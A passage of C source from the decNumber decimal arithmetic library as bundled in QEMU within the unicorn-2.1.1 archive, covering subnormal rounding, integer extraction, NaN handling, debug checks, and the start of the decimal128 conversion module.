remove */ if (adjust<=0) { /* not out of range; unrounded */ /* residue can never be non-zero here, except in the Nmin-residue */ /* case (which is a subnormal result), so can take fast-path here */ /* it may already be inexact (from setting the coefficient) */ if (*status&DEC_Inexact) *status|=DEC_Underflow; return; } /* adjust>0, so need to rescale the result so exponent becomes Etiny */ /* [this code is similar to that in rescale] */ workset=*set; /* clone rounding, etc. */ workset.digits=dn->digits-adjust; /* set requested length */ workset.emin-=adjust; /* and adjust emin to match */ /* [note that the latter can be <1, here, similar to Rescale case] */ decSetCoeff(dn, &workset, dn->lsu, dn->digits, residue, status); decApplyRound(dn, &workset, *residue, status); /* Use 754R/854 default rule: Underflow is set iff Inexact */ /* [independent of whether trapped] */ if (*status&DEC_Inexact) *status|=DEC_Underflow; /* if rounded up a 999s case, exponent will be off by one; adjust */ /* back if so [it will fit, because it was shortened earlier] */ if (dn->exponent>etiny) { dn->digits=decShiftToMost(dn->lsu, dn->digits, 1); dn->exponent--; /* (re)adjust the exponent. */ } /* if rounded to zero, it is by definition clamped... */ if (ISZERO(dn)) *status|=DEC_Clamped; } /* decSetSubnormal */ /* ------------------------------------------------------------------ */ /* decCheckMath - check entry conditions for a math function */ /* */ /* This checks the context and the operand */ /* */ /* rhs is the operand to check */ /* set is the context to check */ /* status is unchanged if both are good */ /* */ /* returns non-zero if status is changed, 0 otherwise */ /* */ /* Restrictions enforced: */ /* */ /* digits, emax, and -emin in the context must be less than */ /* DEC_MAX_MATH (999999), and A must be within these bounds if */ /* non-zero. Invalid_operation is set in the status if a */ /* restriction is violated. */ /* ------------------------------------------------------------------ */ static uInt decCheckMath(const decNumber *rhs, decContext *set, uInt *status) { uInt save=*status; /* record */ if (set->digits>DEC_MAX_MATH || set->emax>DEC_MAX_MATH || -set->emin>DEC_MAX_MATH) *status|=DEC_Invalid_context; else if ((rhs->digits>DEC_MAX_MATH || rhs->exponent+rhs->digits>DEC_MAX_MATH+1 || rhs->exponent+rhs->digits<2*(1-DEC_MAX_MATH)) && !ISZERO(rhs)) *status|=DEC_Invalid_operation; return (*status!=save); } /* decCheckMath */ /* ------------------------------------------------------------------ */ /* decGetInt -- get integer from a number */ /* */ /* dn is the number [which will not be altered] */ /* */ /* returns one of: */ /* BADINT if there is a non-zero fraction */ /* the converted integer */ /* BIGEVEN if the integer is even and magnitude > 2*10**9 */ /* BIGODD if the integer is odd and magnitude > 2*10**9 */ /* */ /* This checks and gets a whole number from the input decNumber. */ /* The sign can be determined from dn by the caller when BIGEVEN or */ /* BIGODD is returned. */ /* ------------------------------------------------------------------ */ static Int decGetInt(const decNumber *dn) { Int theInt; /* result accumulator */ const Unit *up; /* work */ Int got; /* digits (real or not) processed */ Int ilength=dn->digits+dn->exponent; /* integral length */ Flag neg=decNumberIsNegative(dn); /* 1 if -ve */ /* The number must be an integer that fits in 10 digits */ /* Assert, here, that 10 is enough for any rescale Etiny */ #if DEC_MAX_EMAX > 999999999 #error GetInt may need updating [for Emax] #endif #if DEC_MIN_EMIN < -999999999 #error GetInt may need updating [for Emin] #endif if (ISZERO(dn)) return 0; /* zeros are OK, with any exponent */ up=dn->lsu; /* ready for lsu */ theInt=0; /* ready to accumulate */ if (dn->exponent>=0) { /* relatively easy */ /* no fractional part [usual]; allow for positive exponent */ got=dn->exponent; } else { /* -ve exponent; some fractional part to check and discard */ Int count=-dn->exponent; /* digits to discard */ /* spin up whole units until reach the Unit with the unit digit */ for (; count>=DECDPUN; up++) { if (*up!=0) return BADINT; /* non-zero Unit to discard */ count-=DECDPUN; } if (count==0) got=0; /* [a multiple of DECDPUN] */ else { /* [not multiple of DECDPUN] */ Int rem; /* work */ /* slice off fraction digits and check for non-zero */ #if DECDPUN<=4 theInt=QUOT10(*up, count); rem=*up-theInt*powers[count]; #else rem=*up%powers[count]; /* slice off discards */ theInt=*up/powers[count]; #endif if (rem!=0) return BADINT; /* non-zero fraction */ /* it looks good */ got=DECDPUN-count; /* number of digits so far */ up++; /* ready for next */ } } /* now it's known there's no fractional part */ /* tricky code now, to accumulate up to 9.3 digits */ if (got==0) {theInt=*up; got+=DECDPUN; up++;} /* ensure lsu is there */ if (ilength<11) { Int save=theInt; /* collect any remaining unit(s) */ for (; got<ilength; up++) { theInt+=*up*powers[got]; got+=DECDPUN; } if (ilength==10) { /* need to check for wrap */ if (theInt/(Int)powers[got-DECDPUN]!=(Int)*(up-1)) ilength=11; /* [that test also disallows the BADINT result case] */ else if (neg && theInt>1999999997) ilength=11; else if (!neg && theInt>999999999) ilength=11; if (ilength==11) theInt=save; /* restore correct low bit */ } } if (ilength>10) { /* too big */ if (theInt&1) return BIGODD; /* bottom bit 1 */ return BIGEVEN; /* bottom bit 0 */ } if (neg) theInt=-theInt; /* apply sign */ return theInt; } /* decGetInt */ /* ------------------------------------------------------------------ */ /* decDecap -- decapitate the coefficient of a number */ /* */ /* dn is the number to be decapitated */ /* drop is the number of digits to be removed from the left of dn; */ /* this must be <= dn->digits (if equal, the coefficient is */ /* set to 0) */ /* */ /* Returns dn; dn->digits will be <= the initial digits less drop */ /* (after removing drop digits there may be leading zero digits */ /* which will also be removed). Only dn->lsu and dn->digits change. */ /* ------------------------------------------------------------------ */ static decNumber *decDecap(decNumber *dn, Int drop) { Unit *msu; /* -> target cut point */ Int cut; /* work */ if (drop>=dn->digits) { /* losing the whole thing */ #if DECCHECK if (drop>dn->digits) printf("decDecap called with drop>digits [%ld>%ld]\n", (LI)drop, (LI)dn->digits); #endif dn->lsu[0]=0; dn->digits=1; return dn; } msu=dn->lsu+D2U(dn->digits-drop)-1; /* -> likely msu */ cut=MSUDIGITS(dn->digits-drop); /* digits to be in use in msu */ if (cut!=DECDPUN) *msu%=powers[cut]; /* clear left digits */ /* that may have left leading zero digits, so do a proper count... */ dn->digits=decGetDigits(dn->lsu, msu-dn->lsu+1); return dn; } /* decDecap */ /* ------------------------------------------------------------------ */ /* decBiStr -- compare string with pairwise options */ /* */ /* targ is the string to compare */ /* str1 is one of the strings to compare against (length may be 0) */ /* str2 is the other; it must be the same length as str1 */ /* */ /* returns 1 if strings compare equal, (that is, it is the same */ /* length as str1 and str2, and each character of targ is in either */ /* str1 or str2 in the corresponding position), or 0 otherwise */ /* */ /* This is used for generic caseless compare, including the awkward */ /* case of the Turkish dotted and dotless Is. Use as (for example): */ /* if (decBiStr(test, "mike", "MIKE")) ... */ /* ------------------------------------------------------------------ */ static Flag decBiStr(const char *targ, const char *str1, const char *str2) { for (;;targ++, str1++, str2++) { if (*targ!=*str1 && *targ!=*str2) return 0; /* *targ has a match in one (or both, if terminator) */ if (*targ=='\0') break; } /* forever */ return 1; } /* decBiStr */ /* ------------------------------------------------------------------ */ /* decNaNs -- handle NaN operand or operands */ /* */ /* res is the result number */ /* lhs is the first operand */ /* rhs is the second operand, or NULL if none */ /* context is used to limit payload length */ /* status contains the current status */ /* returns res in case convenient */ /* */ /* Called when one or both operands is a NaN, and propagates the */ /* appropriate result to res. When an sNaN is found, it is changed */ /* to a qNaN and Invalid operation is set. */ /* ------------------------------------------------------------------ */ static decNumber * decNaNs(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, uInt *status) { /* This decision tree ends up with LHS being the source pointer, */ /* and status updated if need be */ if (lhs->bits & DECSNAN) *status|=DEC_Invalid_operation | DEC_sNaN; else if (rhs==NULL); else if (rhs->bits & DECSNAN) { lhs=rhs; *status|=DEC_Invalid_operation | DEC_sNaN; } else if (lhs->bits & DECNAN); else lhs=rhs; /* propagate the payload */ if (lhs->digits<=set->digits) decNumberCopy(res, lhs); /* easy */ else { /* too long */ const Unit *ul; Unit *ur, *uresp1; /* copy safe number of units, then decapitate */ res->bits=lhs->bits; /* need sign etc. */ uresp1=res->lsu+D2U(set->digits); for (ur=res->lsu, ul=lhs->lsu; ur<uresp1; ur++, ul++) *ur=*ul; res->digits=D2U(set->digits)*DECDPUN; /* maybe still too long */ if (res->digits>set->digits) decDecap(res, res->digits-set->digits); } res->bits&=~DECSNAN; /* convert any sNaN to NaN, while */ res->bits|=DECNAN; /* .. preserving sign */ res->exponent=0; /* clean exponent */ /* [coefficient was copied/decapitated] */ return res; } /* decNaNs */ /* ------------------------------------------------------------------ */ /* decStatus -- apply non-zero status */ /* */ /* dn is the number to set if error */ /* status contains the current status (not yet in context) */ /* set is the context */ /* */ /* If the status is an error status, the number is set to a NaN, */ /* unless the error was an overflow, divide-by-zero, or underflow, */ /* in which case the number will have already been set. */ /* */ /* The context status is then updated with the new status. Note that */ /* this may raise a signal, so control may never return from this */ /* routine (hence resources must be recovered before it is called). */ /* ------------------------------------------------------------------ */ static void decStatus(decNumber *dn, uInt status, decContext *set) { if (status & DEC_NaNs) { /* error status -> NaN */ /* if cause was an sNaN, clear and propagate [NaN is already set up] */ if (status & DEC_sNaN) status&=~DEC_sNaN; else { decNumberZero(dn); /* other error: clean throughout */ dn->bits=DECNAN; /* and make a quiet NaN */ } } decContextSetStatus(set, status); /* [may not return] */ return; } /* decStatus */ /* ------------------------------------------------------------------ */ /* decGetDigits -- count digits in a Units array */ /* */ /* uar is the Unit array holding the number (this is often an */ /* accumulator of some sort) */ /* len is the length of the array in units [>=1] */ /* */ /* returns the number of (significant) digits in the array */ /* */ /* All leading zeros are excluded, except the last if the array has */ /* only zero Units. */ /* ------------------------------------------------------------------ */ /* This may be called twice during some operations. */ static Int decGetDigits(Unit *uar, Int len) { Unit *up=uar+(len-1); /* -> msu */ Int digits=(len-1)*DECDPUN+1; /* possible digits excluding msu */ #if DECDPUN>4 uInt const *pow; /* work */ #endif /* (at least 1 in final msu) */ #if DECCHECK if (len<1) printf("decGetDigits called with len<1 [%ld]\n", (LI)len); #endif for (; up>=uar; up--) { if (*up==0) { /* unit is all 0s */ if (digits==1) break; /* a zero has one digit */ digits-=DECDPUN; /* adjust for 0 unit */ continue;} /* found the first (most significant) non-zero Unit */ #if DECDPUN>1 /* not done yet */ if (*up<10) break; /* is 1-9 */ digits++; #if DECDPUN>2 /* not done yet */ if (*up<100) break; /* is 10-99 */ digits++; #if DECDPUN>3 /* not done yet */ if (*up<1000) break; /* is 100-999 */ digits++; #if DECDPUN>4 /* count the rest ... */ for (pow=&powers[4]; *up>=*pow; pow++) digits++; #endif #endif #endif #endif break; } /* up */ return digits; } /* decGetDigits */ #if DECTRACE | DECCHECK /* ------------------------------------------------------------------ */ /* decNumberShow -- display a number [debug aid] */ /* dn is the number to show */ /* */ /* Shows: sign, exponent, coefficient (msu first), digits */ /* or: sign, special-value */ /* ------------------------------------------------------------------ */ /* this is public so other modules can use it */ void decNumberShow(const decNumber *dn) { const Unit *up; /* work */ uInt u, d; /* .. */ Int cut; /* .. */ char isign='+'; /* main sign */ if (dn==NULL) { printf("NULL\n"); return;} if (decNumberIsNegative(dn)) isign='-'; printf(" >> %c ", isign); if (dn->bits&DECSPECIAL) { /* Is a special value */ if (decNumberIsInfinite(dn)) printf("Infinity"); else { /* a NaN */ if (dn->bits&DECSNAN) printf("sNaN"); /* signalling NaN */ else printf("NaN"); } /* if coefficient and exponent are 0, no more to do */ if (dn->exponent==0 && dn->digits==1 && *dn->lsu==0) { printf("\n"); return;} /* drop through to report other information */ printf(" "); } /* now carefully display the coefficient */ up=dn->lsu+D2U(dn->digits)-1; /* msu */ printf("%ld", (LI)*up); for (up=up-1; up>=dn->lsu; up--) { u=*up; printf(":"); for (cut=DECDPUN-1; cut>=0; cut--) { d=u/powers[cut]; u-=d*powers[cut]; printf("%ld", (LI)d); } /* cut */ } /* up */ if (dn->exponent!=0) { char esign='+'; if (dn->exponent<0) esign='-'; printf(" E%c%ld", esign, (LI)abs(dn->exponent)); } printf(" [%ld]\n", (LI)dn->digits); } /* decNumberShow */ #endif #if DECTRACE || DECCHECK /* ------------------------------------------------------------------ */ /* decDumpAr -- display a unit array [debug/check aid] */ /* name is a single-character tag name */ /* ar is the array to display */ /* len is the length of the array in Units */ /* ------------------------------------------------------------------ */ static void decDumpAr(char name, const Unit *ar, Int len) { Int i; const char *spec; #if DECDPUN==9 spec="%09d "; #elif DECDPUN==8 spec="%08d "; #elif DECDPUN==7 spec="%07d "; #elif DECDPUN==6 spec="%06d "; #elif DECDPUN==5 spec="%05d "; #elif DECDPUN==4 spec="%04d "; #elif DECDPUN==3 spec="%03d "; #elif DECDPUN==2 spec="%02d "; #else spec="%d "; #endif printf(" :%c: ", name); for (i=len-1; i>=0; i--) { if (i==len-1) printf("%ld ", (LI)ar[i]); else printf(spec, ar[i]); } printf("\n"); return;} #endif #if DECCHECK /* ------------------------------------------------------------------ */ /* decCheckOperands -- check operand(s) to a routine */ /* res is the result structure (not checked; it will be set to */ /* quiet NaN if error found (and it is not NULL)) */ /* lhs is the first operand (may be DECUNRESU) */ /* rhs is the second (may be DECUNUSED) */ /* set is the context (may be DECUNCONT) */ /* returns 0 if both operands, and the context are clean, or 1 */ /* otherwise (in which case the context will show an error, */ /* unless NULL). Note that res is not cleaned; caller should */ /* handle this so res=NULL case is safe. */ /* The caller is expected to abandon immediately if 1 is returned. */ /* ------------------------------------------------------------------ */ static Flag decCheckOperands(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { Flag bad=0; if (set==NULL) { /* oops; hopeless */ #if DECTRACE || DECVERB printf("Reference to context is NULL.\n"); #endif bad=1; return 1;} else if (set!=DECUNCONT && (set->digits<1 || set->round>=DEC_ROUND_MAX)) { bad=1; #if DECTRACE || DECVERB printf("Bad context [digits=%ld round=%ld].\n", (LI)set->digits, (LI)set->round); #endif } else { if (res==NULL) { bad=1; #if DECTRACE /* this one not DECVERB as standard tests include NULL */ printf("Reference to result is NULL.\n"); #endif } if (!bad && lhs!=DECUNUSED) bad=(decCheckNumber(lhs)); if (!bad && rhs!=DECUNUSED) bad=(decCheckNumber(rhs)); } if (bad) { if (set!=DECUNCONT) decContextSetStatus(set, DEC_Invalid_operation); if (res!=DECUNRESU && res!=NULL) { decNumberZero(res); res->bits=DECNAN; /* qNaN */ } } return bad; } /* decCheckOperands */ /* ------------------------------------------------------------------ */ /* decCheckNumber -- check a number */ /* dn is the number to check */ /* returns 0 if the number is clean, or 1 otherwise */ /* */ /* The number is considered valid if it could be a result from some */ /* operation in some valid context. */ /* ------------------------------------------------------------------ */ static Flag decCheckNumber(const decNumber *dn) { const Unit *up; /* work */ uInt maxuint; /* .. */ Int ae, d, digits; /* .. */ Int emin, emax; /* .. */ if (dn==NULL) { /* hopeless */ #if DECTRACE /* this one not DECVERB as standard tests include NULL */ printf("Reference to decNumber is NULL.\n"); #endif return 1;} /* check special values */ if (dn->bits & DECSPECIAL) { if (dn->exponent!=0) { #if DECTRACE || DECVERB printf("Exponent %ld (not 0) for a special value [%02x].\n", (LI)dn->exponent, dn->bits); #endif return 1;} /* 2003.09.08: NaNs may now have coefficients, so next tests Inf only */ if (decNumberIsInfinite(dn)) { if (dn->digits!=1) { #if DECTRACE || DECVERB printf("Digits %ld (not 1) for an infinity.\n", (LI)dn->digits); #endif return 1;} if (*dn->lsu!=0) { #if DECTRACE || DECVERB printf("LSU %ld (not 0) for an infinity.\n", (LI)*dn->lsu); #endif decDumpAr('I', dn->lsu, D2U(dn->digits)); return 1;} } /* Inf */ /* 2002.12.26: negative NaNs can now appear through proposed IEEE */ /* concrete formats (decimal64, etc.). */ return 0; } /* check the coefficient */ if (dn->digits<1 || dn->digits>DECNUMMAXP) { #if DECTRACE || DECVERB printf("Digits %ld in number.\n", (LI)dn->digits); #endif return 1;} d=dn->digits; for (up=dn->lsu; d>0; up++) { if (d>DECDPUN) maxuint=DECDPUNMAX; else { /* reached the msu */ maxuint=powers[d]-1; if (dn->digits>1 && *up<powers[d-1]) { #if DECTRACE || DECVERB printf("Leading 0 in number.\n"); decNumberShow(dn); #endif return 1;} } if (*up>maxuint) { #if DECTRACE || DECVERB printf("Bad Unit [%08lx] in %ld-digit number at offset %ld [maxuint %ld].\n", (LI)*up, (LI)dn->digits, (LI)(up-dn->lsu), (LI)maxuint); #endif return 1;} d-=DECDPUN; } /* check the exponent. Note that input operands can have exponents */ /* which are out of the set->emin/set->emax and set->digits range */ /* (just as they can have more digits than set->digits). */ ae=dn->exponent+dn->digits-1; /* adjusted exponent */ emax=DECNUMMAXE; emin=DECNUMMINE; digits=DECNUMMAXP; if (ae<emin-(digits-1)) { #if DECTRACE || DECVERB printf("Adjusted exponent underflow [%ld].\n", (LI)ae); decNumberShow(dn); #endif return 1;} if (ae>+emax) { #if DECTRACE || DECVERB printf("Adjusted exponent overflow [%ld].\n", (LI)ae); decNumberShow(dn); #endif return 1;} return 0; /* it's OK */ } /* decCheckNumber */ /* ------------------------------------------------------------------ */ /* decCheckInexact -- check a normal finite inexact result has digits */ /* dn is the number to check */ /* set is the context (for status and precision) */ /* sets Invalid operation, etc., if some digits are missing */ /* [this check is not made for DECSUBSET compilation or when */ /* subnormal is not set] */ /* ------------------------------------------------------------------ */ static void decCheckInexact(const decNumber *dn, decContext *set) { #if !DECSUBSET && DECEXTFLAG if ((set->status & (DEC_Inexact|DEC_Subnormal))==DEC_Inexact && (set->digits!=dn->digits) && !(dn->bits & DECSPECIAL)) { #if DECTRACE || DECVERB printf("Insufficient digits [%ld] on normal Inexact result.\n", (LI)dn->digits); decNumberShow(dn); #endif decContextSetStatus(set, DEC_Invalid_operation); } #else /* next is a noop for quiet compiler */ if (dn!=NULL && dn->digits==0) set->status|=DEC_Invalid_operation; #endif return; } /* decCheckInexact */ #endif #if DECALLOC #undef malloc #undef free /* ------------------------------------------------------------------ */ /* decMalloc -- accountable allocation routine */ /* n is the number of bytes to allocate */ /* */ /* Semantics is the same as the stdlib malloc routine, but bytes */ /* allocated are accounted for globally, and corruption fences are */ /* added before and after the 'actual' storage. */ /* ------------------------------------------------------------------ */ /* This routine allocates storage with an extra twelve bytes; 8 are */ /* at the start and hold: */ /* 0-3 the original length requested */ /* 4-7 buffer corruption detection fence (DECFENCE, x4) */ /* The 4 bytes at the end also hold a corruption fence (DECFENCE, x4) */ /* ------------------------------------------------------------------ */ static void *decMalloc(size_t n) { uInt size=n+12; /* true size */ void *alloc; /* -> allocated storage */ uInt *j; /* work */ uByte *b, *b0; /* .. */ alloc=malloc(size); /* -> allocated storage */ if (alloc==NULL) return NULL; /* out of strorage */ b0=(uByte *)alloc; /* as bytes */ decAllocBytes+=n; /* account for storage */ j=(uInt *)alloc; /* -> first four bytes */ *j=n; /* save n */ /* printf(" alloc ++ dAB: %ld (%d)\n", decAllocBytes, n); */ for (b=b0+4; b<b0+8; b++) *b=DECFENCE; for (b=b0+n+8; b<b0+n+12; b++) *b=DECFENCE; return b0+8; /* -> play area */ } /* decMalloc */ /* ------------------------------------------------------------------ */ /* decFree -- accountable free routine */ /* alloc is the storage to free */ /* */ /* Semantics is the same as the stdlib malloc routine, except that */ /* the global storage accounting is updated and the fences are */ /* checked to ensure that no routine has written 'out of bounds'. */ /* ------------------------------------------------------------------ */ /* This routine first checks that the fences have not been corrupted. */ /* It then frees the storage using the 'truw' storage address (that */ /* is, offset by 8). */ /* ------------------------------------------------------------------ */ static void decFree(void *alloc) { uInt *j, n; /* pointer, original length */ uByte *b, *b0; /* work */ if (alloc==NULL) return; /* allowed; it's a nop */ b0=(uByte *)alloc; /* as bytes */ b0-=8; /* -> true start of storage */ j=(uInt *)b0; /* -> first four bytes */ n=*j; /* lift */ for (b=b0+4; b<b0+8; b++) if (*b!=DECFENCE) printf("=== Corrupt byte [%02x] at offset %d from %ld ===\n", *b, b-b0-8, (Int)b0); for (b=b0+n+8; b<b0+n+12; b++) if (*b!=DECFENCE) printf("=== Corrupt byte [%02x] at offset +%d from %ld, n=%ld ===\n", *b, b-b0-8, (Int)b0, n); free(b0); /* drop the storage */ decAllocBytes-=n; /* account for storage */ /* printf(" free -- dAB: %d (%d)\n", decAllocBytes, -n); */ } /* decFree */ #define malloc(a) decMalloc(a) #define free(a) decFree(a) #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/libdecnumber/dpd/����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017355�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/libdecnumber/dpd/decimal128.c����������������������������������������������������0000664�0000000�0000000�00000053544�14675241067�0021365�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 128-bit format module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 128-bit format module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for decimal128 format numbers. */ /* Conversions are supplied to and from decNumber and String. */ /* */ /* This is used when decNumber provides operations, either for all */ /* operations or as a proxy between decNumber and decSingle. */ /* */ /* Error handling is the same as decNumber (qv.). */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #define DECNUMDIGITS 34 /* make decNumbers with space for 34 */ #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" #include "libdecnumber/dpd/decimal128.h" /* Utility routines and tables [in decimal64.c] */ extern const uInt COMBEXP[32], COMBMSD[32]; extern const uByte BIN2CHAR[4001]; extern void decDigitsFromDPD(decNumber *, const uInt *, Int); extern void decDigitsToDPD(const decNumber *, uInt *, Int); #if DECTRACE || DECCHECK void decimal128Show(const decimal128 *); /* for debug */ extern void decNumberShow(const decNumber *); /* .. */ #endif /* Useful macro */ /* Clear a structure (e.g., a decNumber) */ #define DEC_clear(d) memset(d, 0, sizeof(*d)) /* ------------------------------------------------------------------ */ /* decimal128FromNumber -- convert decNumber to decimal128 */ /* */ /* ds is the target decimal128 */ /* dn is the source number (assumed valid) */ /* set is the context, used only for reporting errors */ /* */ /* The set argument is used only for status reporting and for the */ /* rounding mode (used if the coefficient is more than DECIMAL128_Pmax*/ /* digits or an overflow is detected). If the exponent is out of the */ /* valid range then Overflow or Underflow will be raised. */ /* After Underflow a subnormal result is possible. */ /* */ /* DEC_Clamped is set if the number has to be 'folded down' to fit, */ /* by reducing its exponent and multiplying the coefficient by a */ /* power of ten, or if the exponent on a zero had to be clamped. */ /* ------------------------------------------------------------------ */ decimal128 * decimal128FromNumber(decimal128 *d128, const decNumber *dn, decContext *set) { uInt status=0; /* status accumulator */ Int ae; /* adjusted exponent */ decNumber dw; /* work */ decContext dc; /* .. */ uInt *pu; /* .. */ uInt comb, exp; /* .. */ uInt targar[4]={0,0,0,0}; /* target 128-bit */ #define targhi targar[3] /* name the word with the sign */ #define targmh targar[2] /* name the words */ #define targml targar[1] /* .. */ #define targlo targar[0] /* .. */ /* If the number has too many digits, or the exponent could be */ /* out of range then reduce the number under the appropriate */ /* constraints. This could push the number to Infinity or zero, */ /* so this check and rounding must be done before generating the */ /* decimal128] */ ae=dn->exponent+dn->digits-1; /* [0 if special] */ if (dn->digits>DECIMAL128_Pmax /* too many digits */ || ae>DECIMAL128_Emax /* likely overflow */ || ae<DECIMAL128_Emin) { /* likely underflow */ decContextDefault(&dc, DEC_INIT_DECIMAL128); /* [no traps] */ dc.round=set->round; /* use supplied rounding */ decNumberPlus(&dw, dn, &dc); /* (round and check) */ /* [this changes -0 to 0, so enforce the sign...] */ dw.bits|=dn->bits&DECNEG; status=dc.status; /* save status */ dn=&dw; /* use the work number */ } /* maybe out of range */ if (dn->bits&DECSPECIAL) { /* a special value */ if (dn->bits&DECINF) targhi=DECIMAL_Inf<<24; else { /* sNaN or qNaN */ if ((*dn->lsu!=0 || dn->digits>1) /* non-zero coefficient */ && (dn->digits<DECIMAL128_Pmax)) { /* coefficient fits */ decDigitsToDPD(dn, targar, 0); } if (dn->bits&DECNAN) targhi|=DECIMAL_NaN<<24; else targhi|=DECIMAL_sNaN<<24; } /* a NaN */ } /* special */ else { /* is finite */ if (decNumberIsZero(dn)) { /* is a zero */ /* set and clamp exponent */ if (dn->exponent<-DECIMAL128_Bias) { exp=0; /* low clamp */ status|=DEC_Clamped; } else { exp=dn->exponent+DECIMAL128_Bias; /* bias exponent */ if (exp>DECIMAL128_Ehigh) { /* top clamp */ exp=DECIMAL128_Ehigh; status|=DEC_Clamped; } } comb=(exp>>9) & 0x18; /* msd=0, exp top 2 bits .. */ } else { /* non-zero finite number */ uInt msd; /* work */ Int pad=0; /* coefficient pad digits */ /* the dn is known to fit, but it may need to be padded */ exp=(uInt)(dn->exponent+DECIMAL128_Bias); /* bias exponent */ if (exp>DECIMAL128_Ehigh) { /* fold-down case */ pad=exp-DECIMAL128_Ehigh; exp=DECIMAL128_Ehigh; /* [to maximum] */ status|=DEC_Clamped; } /* [fastpath for common case is not a win, here] */ decDigitsToDPD(dn, targar, pad); /* save and clear the top digit */ msd=targhi>>14; targhi&=0x00003fff; /* create the combination field */ if (msd>=8) comb=0x18 | ((exp>>11) & 0x06) | (msd & 0x01); else comb=((exp>>9) & 0x18) | msd; } targhi|=comb<<26; /* add combination field .. */ targhi|=(exp&0xfff)<<14; /* .. and exponent continuation */ } /* finite */ if (dn->bits&DECNEG) targhi|=0x80000000; /* add sign bit */ /* now write to storage; this is endian */ pu=(uInt *)d128->bytes; /* overlay */ if (DECLITEND) { pu[0]=targlo; /* directly store the low int */ pu[1]=targml; /* then the mid-low */ pu[2]=targmh; /* then the mid-high */ pu[3]=targhi; /* then the high int */ } else { pu[0]=targhi; /* directly store the high int */ pu[1]=targmh; /* then the mid-high */ pu[2]=targml; /* then the mid-low */ pu[3]=targlo; /* then the low int */ } if (status!=0) decContextSetStatus(set, status); /* pass on status */ /* decimal128Show(d128); */ return d128; } /* decimal128FromNumber */ /* ------------------------------------------------------------------ */ /* decimal128ToNumber -- convert decimal128 to decNumber */ /* d128 is the source decimal128 */ /* dn is the target number, with appropriate space */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decimal128ToNumber(const decimal128 *d128, decNumber *dn) { uInt msd; /* coefficient MSD */ uInt exp; /* exponent top two bits */ uInt comb; /* combination field */ const uInt *pu; /* work */ Int need; /* .. */ uInt sourar[4]; /* source 128-bit */ #define sourhi sourar[3] /* name the word with the sign */ #define sourmh sourar[2] /* and the mid-high word */ #define sourml sourar[1] /* and the mod-low word */ #define sourlo sourar[0] /* and the lowest word */ /* load source from storage; this is endian */ pu=(const uInt *)d128->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourml=pu[1]; /* then the mid-low */ sourmh=pu[2]; /* then the mid-high */ sourhi=pu[3]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourmh=pu[1]; /* then the mid-high */ sourml=pu[2]; /* then the mid-low */ sourlo=pu[3]; /* then the low int */ } comb=(sourhi>>26)&0x1f; /* combination field */ decNumberZero(dn); /* clean number */ if (sourhi&0x80000000) dn->bits=DECNEG; /* set sign if negative */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { /* is a special */ if (msd==0) { dn->bits|=DECINF; return dn; /* no coefficient needed */ } else if (sourhi&0x02000000) dn->bits|=DECSNAN; else dn->bits|=DECNAN; msd=0; /* no top digit */ } else { /* is a finite number */ dn->exponent=(exp<<12)+((sourhi>>14)&0xfff)-DECIMAL128_Bias; /* unbiased */ } /* get the coefficient */ sourhi&=0x00003fff; /* clean coefficient continuation */ if (msd) { /* non-zero msd */ sourhi|=msd<<14; /* prefix to coefficient */ need=12; /* process 12 declets */ } else { /* msd=0 */ if (sourhi) need=11; /* declets to process */ else if (sourmh) need=10; else if (sourml) need=7; else if (sourlo) need=4; else return dn; /* easy: coefficient is 0 */ } /*msd=0 */ decDigitsFromDPD(dn, sourar, need); /* process declets */ /* decNumberShow(dn); */ return dn; } /* decimal128ToNumber */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decimal128ToString(d128, string); */ /* decimal128ToEngString(d128, string); */ /* */ /* d128 is the decimal128 format number to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least 24 characters */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decimal128ToEngString(const decimal128 *d128, char *string){ decNumber dn; /* work */ decimal128ToNumber(d128, &dn); decNumberToEngString(&dn, string); return string; } /* decimal128ToEngString */ char * decimal128ToString(const decimal128 *d128, char *string){ uInt msd; /* coefficient MSD */ Int exp; /* exponent top two bits or full */ uInt comb; /* combination field */ char *cstart; /* coefficient start */ char *c; /* output pointer in string */ const uInt *pu; /* work */ char *s, *t; /* .. (source, target) */ Int dpd; /* .. */ Int pre, e; /* .. */ const uByte *u; /* .. */ uInt sourar[4]; /* source 128-bit */ #define sourhi sourar[3] /* name the word with the sign */ #define sourmh sourar[2] /* and the mid-high word */ #define sourml sourar[1] /* and the mod-low word */ #define sourlo sourar[0] /* and the lowest word */ /* 